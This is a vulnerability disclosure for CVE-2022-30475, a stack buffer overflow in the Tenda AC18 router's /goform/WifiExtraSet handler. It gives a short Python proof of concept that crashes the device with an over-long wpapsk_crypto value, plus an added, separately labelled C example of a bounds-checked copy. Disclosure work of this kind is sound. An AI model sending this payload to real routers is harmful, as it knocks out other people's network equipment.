CVE-2022-30475: VulnRepo/IoT/Tenda/3 at master · lcyfrank/VulnRepo

Tenda AC Series Router AC18_V15.03.05.19(6318) was discovered to contain a stack-based buffer overflow in the httpd module when handling /goform/WifiExtraSet request.


Tenda Router AC18 Vulnerability

This vulnerability lies in the /goform/WifiExtraSet page and affects the latest version of the Tenda Router AC18. (The latest version is AC18_V15.03.05.19(6318).)

Vulnerability Description

There is a stack-based buffer overflow vulnerability in function fromSetWirelessRepeat.

In function fromSetWirelessRepeat, the user-provided parameter wpapsk_crypto is read into victim_buf, and this variable is passed to strcpy without any length check, which may overflow the stack-based buffer vuln_buf.

So by requesting the page /goform/WifiExtraSet, an attacker can easily perform a Denial of Service attack.
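The missing length check described above, shown as an added example that is not code from the advisory or from Tenda's firmware: the parameter is copied into the fixed-size stack buffer only if it fits, and rejected otherwise. The helper and handler names, the return codes and the CRYPTO_MAX size are assumptions made for illustration.

```c
#include <stdio.h>
#include <string.h>

/* Assumed buffer size; the firmware's real size is not given on the page. */
#define CRYPTO_MAX 32
enum { PARAM_OK = 0, PARAM_MISSING = -1, PARAM_TOO_LONG = -2 };

/* Find name=value in a query string and copy the value into dst only if it
 * fits, NUL terminator included. Never writes more than dst_size bytes. */
int get_param_bounded(const char *query, const char *name,
                      char *dst, size_t dst_size)
{
    size_t name_len = strlen(name);
    const char *p = query;

    while (p && *p) {
        const char *end = strchr(p, '&');
        size_t pair_len = end ? (size_t)(end - p) : strlen(p);

        if (pair_len > name_len && strncmp(p, name, name_len) == 0 &&
            p[name_len] == '=') {
            size_t val_len = pair_len - name_len - 1;
            if (val_len >= dst_size)
                return PARAM_TOO_LONG;   /* reject, do not truncate or overflow */
            memcpy(dst, p + name_len + 1, val_len);
            dst[val_len] = '\0';
            return PARAM_OK;
        }
        p = end ? end + 1 : NULL;
    }
    return PARAM_MISSING;
}

/* Hypothetical handler. The unsafe form is strcpy(vuln_buf, value). */
int handle_wifi_extra_set(const char *query)
{
    char vuln_buf[CRYPTO_MAX];
    int rc = get_param_bounded(query, "wpapsk_crypto", vuln_buf, sizeof vuln_buf);
    if (rc != PARAM_OK)
        return rc;                       /* caller answers with an error page */
    /* The validated value in vuln_buf would be applied here. */
    return PARAM_OK;
}

int main(void)
{
    /* Constructed sample query strings, not captured traffic. */
    printf("%d\n", handle_wifi_extra_set("wl_mode=not_ap&wpapsk_crypto=aes"));
    printf("%d\n", handle_wifi_extra_set("wl_mode=not_ap"));
    return 0;
}
```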

PoC

import requests

IP = "10.10.10.1"
url = f"http://{IP}/goform/WifiExtraSet?"
url += "wl_mode=not_ap&security=wpapsk&wpapsk_key=kkkkkkkk&wpapsk_crypto=" + "s" * 0x600

response = requests.get(url)

Timeline

  • 2022-05-07: Reported to CVE & CNVD
  • 2022-05-26: CVE ID assigned (CVE-2022-30475)

Acknowledgement

Credit to @peanuts and @cylin from IIE, CAS.
